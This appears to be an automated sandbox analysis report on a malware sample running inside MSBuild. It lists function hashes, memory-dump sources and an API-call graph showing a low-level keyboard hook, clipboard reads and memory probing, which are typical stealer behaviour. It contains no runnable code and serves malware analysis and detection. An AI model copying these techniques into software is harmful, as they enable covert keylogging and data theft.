                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7c90000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: c2edac5d5cca287319f32b5bd1f13a38fe91f91998fa070ef2e33b037bb8f6e9
                                                                                                                                        • Instruction ID: 7f8413abb054db84dbde281cb06575e6d9b5df4c603ff115a5cfa569607178d6
                                                                                                                                        • Opcode Fuzzy Hash: c2edac5d5cca287319f32b5bd1f13a38fe91f91998fa070ef2e33b037bb8f6e9
                                                                                                                                        • Instruction Fuzzy Hash: 26E0B6B0D4020ADFDB80EFB9C909A5EBFF1BF08600F1185B9D019E7211EB7496458F91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 07C901C0 Relevance: .0, Instructions: 14COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.326109730.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7c90000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 54eb29295af36d733c6e956d76c2ab8025f654570336458c8b3c31d9c04c3089
                                                                                                                                        • Instruction ID: 318b65d650b95adba19ad5191d8b080fca6464e636a192f0f32ef4a305caadd4
                                                                                                                                        • Opcode Fuzzy Hash: 54eb29295af36d733c6e956d76c2ab8025f654570336458c8b3c31d9c04c3089
                                                                                                                                        • Instruction Fuzzy Hash: 66D012332402099E4F41FA94F849C5277DDBB246007148432E944C6021E621E574E756
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Non-executed Functions

                                                                                                                                        Function 07CA0040 Relevance: 1.4, Strings: 1, Instructions: 113COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.326132287.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7ca0000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: H
                                                                                                                                        • API String ID: 0-2852464175
                                                                                                                                        • Opcode ID: 2c8e647c883a1f82b9d5a61893efb0b9a6c38fd393bfc690ddac9d7687373395
                                                                                                                                        • Instruction ID: 448ded15bf6a3917f59d201d7d4a7b0c4a24088979799eeb8a08317bb569c1c7
                                                                                                                                        • Opcode Fuzzy Hash: 2c8e647c883a1f82b9d5a61893efb0b9a6c38fd393bfc690ddac9d7687373395
                                                                                                                                        • Instruction Fuzzy Hash: 6F5170B1E056589BEB5CCF6BCD4078EFAF7AFC9205F18C1BA950CA6254EB3109958F01
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0325E770 Relevance: .3, Instructions: 315COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.317617120.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_3250000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 97a4e72e706a60310723af1929c7564536f48d8f84ceecd4d183a7b84e8b0ff2
                                                                                                                                        • Instruction ID: 7d70ce6776d604e88a3b8611ca8f8fddf8cace324e58b379c9d9c01aae220ec6
                                                                                                                                        • Opcode Fuzzy Hash: 97a4e72e706a60310723af1929c7564536f48d8f84ceecd4d183a7b84e8b0ff2
                                                                                                                                        • Instruction Fuzzy Hash: 6112B8F1811746CAE310EF65F99C189BBA1F746328BB0D328D2652B6DDD7B8114ACF84
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0325C344 Relevance: .3, Instructions: 265COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.317617120.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_3250000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: fcbe848a9cd30f45e47b9318f7aafd3a4404e9c5f7304ed9f6b0152be5dab0d5
                                                                                                                                        • Instruction ID: 53192530574d5f7f55e5f479acebac59a4194dccf61d80a170646f043c33faee
                                                                                                                                        • Opcode Fuzzy Hash: fcbe848a9cd30f45e47b9318f7aafd3a4404e9c5f7304ed9f6b0152be5dab0d5
                                                                                                                                        • Instruction Fuzzy Hash: 01A17036E2031A8FCF05DFB5C8445DEB7B2FF85301B15856AE805BB261EB71AA85CB40
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0325E760 Relevance: .2, Instructions: 224COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.317617120.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_3250000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 7a1cd14e47934e3791e6f438312338e39b592d84a5437c1d97861ed90a37a5c1
                                                                                                                                        • Instruction ID: 80018de15755a1dbd1fc1e50bee8a9b7f4db1aa948e396acda77410f0ed6a98a
                                                                                                                                        • Opcode Fuzzy Hash: 7a1cd14e47934e3791e6f438312338e39b592d84a5437c1d97861ed90a37a5c1
                                                                                                                                        • Instruction Fuzzy Hash: B2C108B1811746CAE710EF65F89C199BBB1FB86328F70C329D1612B6D8D7B8154ACF84
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 07CA0021 Relevance: .1, Instructions: 109COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.326132287.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7ca0000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: f27633f7e4c9f7e25bf9725aa6cc3c9a8fc8824990e65f1543fd7da069c1f668
                                                                                                                                        • Instruction ID: 10c584c26d8a08be33f7bdf1272aedc54a924fb1d3e69737366ac1aec21b981b
                                                                                                                                        • Opcode Fuzzy Hash: f27633f7e4c9f7e25bf9725aa6cc3c9a8fc8824990e65f1543fd7da069c1f668
                                                                                                                                        • Instruction Fuzzy Hash: D74153B1E056549BE75CCF6B8D402CAFBF7AFC9200F18C1BAD54CAA215EB3505568F11
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:15%
                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                        Signature Coverage:2.7%
                                                                                                                                        Total number of Nodes:258
                                                                                                                                        Total number of Limit Nodes:24
                                                                                                                                        execution_graph 48098 12148c0 48099 12148d4 48098->48099 48102 1214b0a 48099->48102 48108 1214bf0 48102->48108 48112 1214bdf 48102->48112 48116 1214cec 48102->48116 48120 1214d06 48102->48120 48109 1214c34 48108->48109 48110 1214d2b 48109->48110 48124 1214fe7 48109->48124 48113 1214bf0 48112->48113 48114 1214d2b 48113->48114 48115 1214fe7 2 API calls 48113->48115 48115->48114 48117 1214c9f 48116->48117 48118 1214d2b 48117->48118 48119 1214fe7 2 API calls 48117->48119 48119->48118 48121 1214d19 48120->48121 48122 1214d2b 48120->48122 48123 1214fe7 2 API calls 48121->48123 48123->48122 48125 1215006 48124->48125 48129 1215048 48125->48129 48133 1215038 48125->48133 48126 1215016 48126->48110 48130 1215082 48129->48130 48131 12150d5 48130->48131 48132 12150ac RtlEncodePointer 48130->48132 48131->48126 48132->48131 48134 1215048 48133->48134 48135 12150ac RtlEncodePointer 48134->48135 48136 12150d5 48134->48136 48135->48136 48136->48126 48137 6879860 48138 687986b 48137->48138 48139 687987b 48138->48139 48141 6878c0c 48138->48141 48142 68798b0 OleInitialize 48141->48142 48143 6879914 48142->48143 48143->48139 47941 6873088 47942 6873099 47941->47942 47944 68730bc 47941->47944 47943 68730e6 47944->47943 47949 6872330 47944->47949 47946 6873346 47947 6872330 2 API calls 47946->47947 47948 6873386 47947->47948 47950 6872355 47949->47950 47951 687238f 47950->47951 47954 6872757 47950->47954 47959 6872768 47950->47959 47951->47946 47955 6872768 47954->47955 47963 6872791 47955->47963 47972 68727a0 47955->47972 47956 6872776 47956->47951 47961 6872791 2 API calls 47959->47961 47962 68727a0 2 API calls 47959->47962 47960 6872776 47960->47951 47961->47960 47962->47960 47964 68727d5 47963->47964 47965 68727ad 47963->47965 47970 6872791 GlobalMemoryStatusEx 47964->47970 47971 68727a0 GlobalMemoryStatusEx 47964->47971 47965->47956 47966 68727f2 47967 68727f6 47966->47967 47968 68728be GlobalMemoryStatusEx 47966->47968 47967->47956 47969 68728ee 47968->47969 47969->47956 47970->47966 47971->47966 47973 68727d5 47972->47973 47974 68727ad 47972->47974 47979 6872791 GlobalMemoryStatusEx 47973->47979 47980 68727a0 GlobalMemoryStatusEx 47973->47980 47974->47956 47975 68727f6 47975->47956 47976 68727f2 47976->47975 47977 68728be GlobalMemoryStatusEx 47976->47977 47978 68728ee 47977->47978 47978->47956 47979->47976 47980->47976 47981 6870b08 47983 6870b1d 47981->47983 47982 6870dfc 47983->47982 47984 6872320 GlobalMemoryStatusEx GlobalMemoryStatusEx 47983->47984 47985 6872330 GlobalMemoryStatusEx GlobalMemoryStatusEx 47983->47985 47987 687244b 47983->47987 47984->47983 47985->47983 47988 687244c 47987->47988 47989 687248e 47988->47989 47990 6872757 2 API calls 47988->47990 47991 6872768 2 API calls 47988->47991 47989->47983 47990->47989 47991->47989 48004 67fab50 48005 67fab6f 48004->48005 48006 67faba3 LdrInitializeThunk 48005->48006 48007 67fabc0 48006->48007 48012 6874548 48013 687455b 48012->48013 48016 6871fe0 48013->48016 48015 6874566 48017 6871feb 48016->48017 48018 68745d2 48017->48018 48021 68745d7 48017->48021 48033 68745e8 48017->48033 48018->48015 48022 687460a 48021->48022 48023 6874713 48022->48023 48045 687219c 48022->48045 48023->48018 48025 6874864 48032 687219c GetModuleHandleW 48025->48032 48050 6874c50 48025->48050 48056 6874cd2 48025->48056 48061 6874d00 48025->48061 48026 6874880 48028 68748a9 48026->48028 48066 68721ac 48026->48066 48028->48028 48032->48026 48034 687460a 48033->48034 48035 6874713 48034->48035 48036 687219c GetModuleHandleW 48034->48036 48035->48018 48037 6874864 48036->48037 48041 6874cd2 GetModuleHandleW 48037->48041 48042 6874c50 GetModuleHandleW 48037->48042 48043 6874d00 GetModuleHandleW 48037->48043 48044 687219c GetModuleHandleW 48037->48044 48038 6874880 48039 68721ac GetModuleHandleW 48038->48039 48040 68748a9 48038->48040 48039->48040 48041->48038 48042->48038 48043->48038 48044->48038 48047 68721a7 48045->48047 48046 6874c6b 48046->48025 48047->48025 48047->48046 48070 6874e61 48047->48070 48080 6874e70 48047->48080 48051 6874c6b 48050->48051 48052 6874c6f 48050->48052 48051->48026 48052->48026 48053 6874cba 48052->48053 48054 6874e61 GetModuleHandleW 48052->48054 48055 6874e70 GetModuleHandleW 48052->48055 48053->48026 48054->48053 48055->48053 48057 6874cda 48056->48057 48057->48026 48058 6874dae 48057->48058 48059 6874e61 GetModuleHandleW 48057->48059 48060 6874e70 GetModuleHandleW 48057->48060 48059->48058 48060->48058 48062 6874d2d 48061->48062 48063 6874dae 48062->48063 48064 6874e61 GetModuleHandleW 48062->48064 48065 6874e70 GetModuleHandleW 48062->48065 48064->48063 48065->48063 48067 68751b0 GetModuleHandleW 48066->48067 48069 6875225 48067->48069 48069->48028 48071 6874e85 48070->48071 48072 68721ac GetModuleHandleW 48071->48072 48074 6874ea9 48071->48074 48072->48074 48073 6875074 48073->48046 48074->48073 48075 68721ac GetModuleHandleW 48074->48075 48076 6874ffa 48075->48076 48076->48073 48077 68721ac GetModuleHandleW 48076->48077 48078 6875048 48077->48078 48078->48073 48079 68721ac GetModuleHandleW 48078->48079 48079->48073 48081 6874e85 48080->48081 48082 68721ac GetModuleHandleW 48081->48082 48083 6874ea9 48081->48083 48082->48083 48084 68721ac GetModuleHandleW 48083->48084 48089 6875074 48083->48089 48085 6874ffa 48084->48085 48086 68721ac GetModuleHandleW 48085->48086 48085->48089 48087 6875048 48086->48087 48088 68721ac GetModuleHandleW 48087->48088 48087->48089 48088->48089 48089->48046 48144 6877c68 DuplicateHandle 48145 6877cfe 48144->48145 48146 121b150 48147 121b16e 48146->48147 48150 1219fdc 48147->48150 48149 121b1a5 48151 121cc70 LoadLibraryA 48150->48151 48153 121cd4c 48151->48153 48154 105e3f0 48155 105e3f4 48154->48155 48156 105e462 48155->48156 48164 687229c 48155->48164 48168 6878c61 48155->48168 48176 6876471 48155->48176 48180 6876337 48155->48180 48186 6876348 48155->48186 48192 6872248 48155->48192 48196 68722ac 48155->48196 48165 68722a7 48164->48165 48204 68722d4 48165->48204 48167 6876487 48167->48156 48170 6878c70 48168->48170 48169 6878cd1 48220 68788d4 48169->48220 48170->48169 48173 6878cc1 48170->48173 48172 6878ccf 48210 6878de9 48173->48210 48215 6878df8 48173->48215 48177 6876480 48176->48177 48178 68722d4 GetModuleHandleW 48177->48178 48179 6876487 48178->48179 48179->48156 48181 687636e 48180->48181 48182 687229c GetModuleHandleW 48181->48182 48183 687637a 48182->48183 48184 68722ac 2 API calls 48183->48184 48185 687638f 48184->48185 48185->48156 48187 687636e 48186->48187 48188 687229c GetModuleHandleW 48187->48188 48189 687637a 48188->48189 48190 68722ac 2 API calls 48189->48190 48191 687638f 48190->48191 48191->48156 48193 687224d 48192->48193 48194 68722d4 GetModuleHandleW 48193->48194 48195 6876487 48194->48195 48195->48156 48197 68722b7 48196->48197 48198 6878cd1 48197->48198 48200 6878cc1 48197->48200 48199 68788d4 2 API calls 48198->48199 48201 6878ccf 48199->48201 48202 6878de9 2 API calls 48200->48202 48203 6878df8 2 API calls 48200->48203 48201->48201 48202->48201 48203->48201 48205 68722df 48204->48205 48206 687219c GetModuleHandleW 48205->48206 48207 68764e9 48206->48207 48208 68721ac GetModuleHandleW 48207->48208 48209 687651b 48207->48209 48208->48209 48212 6878df8 48210->48212 48211 68788d4 2 API calls 48211->48212 48212->48211 48213 6878eef 48212->48213 48227 68793c8 48212->48227 48213->48172 48217 6878e06 48215->48217 48216 68788d4 2 API calls 48216->48217 48217->48216 48218 6878eef 48217->48218 48219 68793c8 OleGetClipboard 48217->48219 48218->48172 48219->48217 48221 68788df 48220->48221 48222 6878f62 48221->48222 48223 687900c 48221->48223 48224 6878fba CallWindowProcW 48222->48224 48226 6878f69 48222->48226 48225 68722ac OleGetClipboard 48223->48225 48224->48226 48225->48226 48226->48172 48229 68793d4 48227->48229 48228 68795ee 48228->48212 48229->48228 48231 6879640 48229->48231 48233 6879648 48231->48233 48232 687965c 48232->48229 48233->48232 48236 6879688 48233->48236 48234 6879671 48234->48229 48237 687969a 48236->48237 48238 68796b5 48237->48238 48240 68796f9 48237->48240 48243 6879688 OleGetClipboard 48238->48243 48239 68796bb 48239->48234 48242 6879779 48240->48242 48245 6879d50 48240->48245 48242->48234 48243->48239 48247 6879d65 48245->48247 48248 6879797 48247->48248 48249 6878c24 48247->48249 48248->48234 48250 6879df8 OleGetClipboard 48249->48250 48252 6879e92 48250->48252 47992 6876190 47993 68761f8 CreateWindowExW 47992->47993 47995 68762b4 47993->47995 47996 687bb10 47997 687bb2a 47996->47997 47999 687bb6e 47997->47999 48000 687b0f8 47997->48000 48002 687bd00 SetWindowsHookExW 48000->48002 48003 687bd8a 48002->48003 48003->47997 48090 68792d0 48091 68792e0 48090->48091 48094 6878964 48091->48094 48095 6879320 KiUserCallbackDispatcher 48094->48095 48097 68792e7 48095->48097 48008 67fc640 48011 67fc665 48008->48011 48009 67fc7df 48010 67fcdc4 LdrInitializeThunk 48010->48011 48011->48009 48011->48010

                                                                                                                                        Executed Functions

                                                                                                                                        Function 067D5C88 Relevance: 2.9, Instructions: 2897COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e47027345b0cd0c56a758076d1af6a38e3f764b1c74223f1a1600afa9f13bc3e
                                                                                                                                        • Instruction ID: c2ff6efa80908379fd6e217cf9d5323740a20475ff112869a1ec0e8bdd93f1de
                                                                                                                                        • Opcode Fuzzy Hash: e47027345b0cd0c56a758076d1af6a38e3f764b1c74223f1a1600afa9f13bc3e
                                                                                                                                        • Instruction Fuzzy Hash: 0A63FB31D1061A8ECB51EF68C884AA9F7B1FF99310F15D79AE45877221EB70AAC4CF41
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 067D6678 Relevance: 2.8, Instructions: 2776COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 5c0d748e52e1974b4efda69c22fba5b155e86c1e6dbf0f97f04307b0dcc8f76b
                                                                                                                                        • Instruction ID: a0e222c7df623d5b0a438f365cd370603c4091cc659582ffacb41af989c00708
                                                                                                                                        • Opcode Fuzzy Hash: 5c0d748e52e1974b4efda69c22fba5b155e86c1e6dbf0f97f04307b0dcc8f76b
                                                                                                                                        • Instruction Fuzzy Hash: 7B531F31D1061A8ECB51EF68C8846A9F7B1FF99310F15D79AE458B7221EB70AAC4CF41
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 067FC640 Relevance: 2.3, APIs: 1, Instructions: 760libraryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1361 67fc640-67fc746 1378 67fc79d-67fc7a7 1361->1378 1379 67fc748-67fc789 1361->1379 1382 67fc7ad-67fc7dd call 67f3694 1378->1382 1379->1378 1384 67fc78b-67fc79b 1379->1384 1390 67fc7df-67fd1c5 1382->1390 1391 67fc7ed-67fcb9a 1382->1391 1384->1382 1430 67fd185-67fd1a8 1391->1430 1431 67fcba0-67fcbad 1391->1431 1432 67fd1ad-67fd1b7 1430->1432 1431->1432 1433 67fcbb3-67fcc1e 1431->1433 1433->1430 1444 67fcc24-67fcc59 1433->1444 1447 67fcc5b-67fcc80 1444->1447 1448 67fcc82-67fcc8a 1444->1448 1451 67fcc8d-67fccd6 call 67f36a0 1447->1451 1448->1451 1457 67fd16c-67fd172 1451->1457 1458 67fccdc-67fcd34 call 67f36ac 1451->1458 1457->1430 1459 67fd174-67fd17d 1457->1459 1458->1457 1466 67fcd3a-67fcd44 1458->1466 1459->1433 1460 67fd183 1459->1460 1460->1432 1466->1457 1467 67fcd4a-67fcd5d 1466->1467 1467->1457 1468 67fcd63-67fcd8a 1467->1468 1472 67fd12d-67fd150 1468->1472 1473 67fcd90-67fcd93 1468->1473 1481 67fd155-67fd15b 1472->1481 1473->1472 1474 67fcd99-67fcdd3 LdrInitializeThunk 1473->1474 1484 67fcdd9-67fce28 1474->1484 1481->1430 1483 67fd15d-67fd166 1481->1483 1483->1457 1483->1468 1492 67fce2e-67fce67 1484->1492 1493 67fcf6d-67fcf73 1484->1493 1497 67fcf89-67fcf8f 1492->1497 1510 67fce6d-67fcea3 1492->1510 1494 67fcf75-67fcf77 1493->1494 1495 67fcf81 1493->1495 1494->1495 1495->1497 1499 67fcf9d-67fcfa0 1497->1499 1500 67fcf91-67fcf93 1497->1500 1502 67fcfab-67fcfb1 1499->1502 1500->1499 1503 67fcfbf-67fcfc2 1502->1503 1504 67fcfb3-67fcfb5 1502->1504 1506 67fcf11-67fcf41 call 67f36b8 1503->1506 1504->1503 1512 67fcf43-67fcf62 1506->1512 1516 67fcea9-67fcecc 1510->1516 1517 67fcfc7-67fcff5 call 67f36c4 1510->1517 1519 67fcffa-67fd04c 1512->1519 1520 67fcf68 1512->1520 1516->1517 1527 67fced2-67fcf05 1516->1527 1517->1512 1540 67fd04e-67fd054 1519->1540 1541 67fd056-67fd05c 1519->1541 1520->1481 1527->1502 1539 67fcf0b 1527->1539 1539->1506 1542 67fd06d-67fd08b 1540->1542 1543 67fd05e-67fd060 1541->1543 1544 67fd06a 1541->1544 1548 67fd0af-67fd12b 1542->1548 1549 67fd08d-67fd09d 1542->1549 1543->1544 1544->1542 1548->1481 1549->1548 1552 67fd09f-67fd0a8 1549->1552 1552->1548
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.531002054.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_67f0000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 24f0107c42eaf1480dab9072e294e305a0f18c7145d7f652ca3fa439178e8c4e
                                                                                                                                        • Instruction ID: d96ca7bb13edf7270af94fef86b86c91f1001b061c7e665255df0505346b3e99
                                                                                                                                        • Opcode Fuzzy Hash: 24f0107c42eaf1480dab9072e294e305a0f18c7145d7f652ca3fa439178e8c4e
                                                                                                                                        • Instruction Fuzzy Hash: CC622975E006198FCB64EFB8C85469DB7F1AF89304F118AA9D54AAB350EF349D85CF80
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0687B0F8 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 2543 687b0f8-687bd4a 2546 687bd56-687bd88 SetWindowsHookExW 2543->2546 2547 687bd4c-687bd54 2543->2547 2548 687bd91-687bdb1 2546->2548 2549 687bd8a-687bd90 2546->2549 2547->2546 2549->2548
                                                                                                                                        APIs
                                                                                                                                        • SetWindowsHookExW.USER32(0000000D,00000000,?,?), ref: 0687BD7B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.531046079.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_6870000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HookWindows
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2559412058-0
                                                                                                                                        • Opcode ID: 8f0cbd390e2b783533ba39a548baa2771c2cc1f90c05633ae8428f3b4be8d795
                                                                                                                                        • Instruction ID: 4293cf41312d55cb54292ce5f617ba6ad935f8d0579b9b9a9d978ba19fb34c26
                                                                                                                                        • Opcode Fuzzy Hash: 8f0cbd390e2b783533ba39a548baa2771c2cc1f90c05633ae8428f3b4be8d795
                                                                                                                                        • Instruction Fuzzy Hash: 012135B1D002099FCB50CF99C844BEEBBF5FF88314F148429E459A7250DB74A944CFA5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 067DBB18 Relevance: .8, Instructions: 844COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 2b2e812fcceb497efa4964860276c05802a9e2fa34d52f9b0cd50e1a3760e5e2
                                                                                                                                        • Instruction ID: f0f84be0ca1c5d13295c3a7775843f08e794a81a093aac78e73a869235ab9c7e
                                                                                                                                        • Opcode Fuzzy Hash: 2b2e812fcceb497efa4964860276c05802a9e2fa34d52f9b0cd50e1a3760e5e2
                                                                                                                                        • Instruction Fuzzy Hash: CB520F70B002199FDB15DBB4C894BAEBBF6AF89304F158969E506EB391DB34DC01CB91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 067DBD38 Relevance: .5, Instructions: 453COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 8add08181a5dba98cbd35c72f5d47722757ecfa166dbae0468eb77bd3ff5cea3
                                                                                                                                        • Instruction ID: d9a6c1c4584c76cc8263e5615ce1d38b12fbaae71a8e3178f4745081ab4907ba
                                                                                                                                        • Opcode Fuzzy Hash: 8add08181a5dba98cbd35c72f5d47722757ecfa166dbae0468eb77bd3ff5cea3
                                                                                                                                        • Instruction Fuzzy Hash: 83F19B70F002199FDB54DBA8C894BAEB7F6AF88704F158969E505EB395DB34EC01CB90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 067FAAF0 Relevance: 1.7, APIs: 1, Instructions: 175libraryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1685 67faaf0-67fab0f 1686 67fab34-67fab87 call 67f90b0 call 67f91c8 1685->1686 1687 67fab11-67fab1b 1685->1687 1698 67fab8f-67fab95 1686->1698 1688 67fab1d-67fab2e 1687->1688 1689 67fab30-67fab33 1687->1689 1688->1689 1699 67fab9c 1698->1699 1700 67faba3-67fabba LdrInitializeThunk 1699->1700 1701 67fad03-67fad20 1700->1701 1702 67fabc0-67fabda 1700->1702 1714 67fad25-67fad2e 1701->1714 1702->1701 1705 67fabe0-67fabfa 1702->1705 1709 67fabfc-67fabfe 1705->1709 1710 67fac00 1705->1710 1711 67fac03-67fac5e 1709->1711 1710->1711 1720 67fac64 1711->1720 1721 67fac60-67fac62 1711->1721 1722 67fac67-67fad01 1720->1722 1721->1722 1722->1714
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.531002054.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_67f0000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: e399008bc9b28cbcfe160473d0c6288fa139b24893118514caa827da23d92679
                                                                                                                                        • Instruction ID: baf8fe48dbba198e7167f63edcb03bd1bccfe92694251357a01f43fa375c3597
                                                                                                                                        • Opcode Fuzzy Hash: e399008bc9b28cbcfe160473d0c6288fa139b24893118514caa827da23d92679
                                                                                                                                        • Instruction Fuzzy Hash: 4651D331E102069FCB44EF74D899AAEB7F6AF45204F148A79E605EB395DF34E804CB61
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 067FAB50 Relevance: 1.6, APIs: 1, Instructions: 148libraryCOMMON
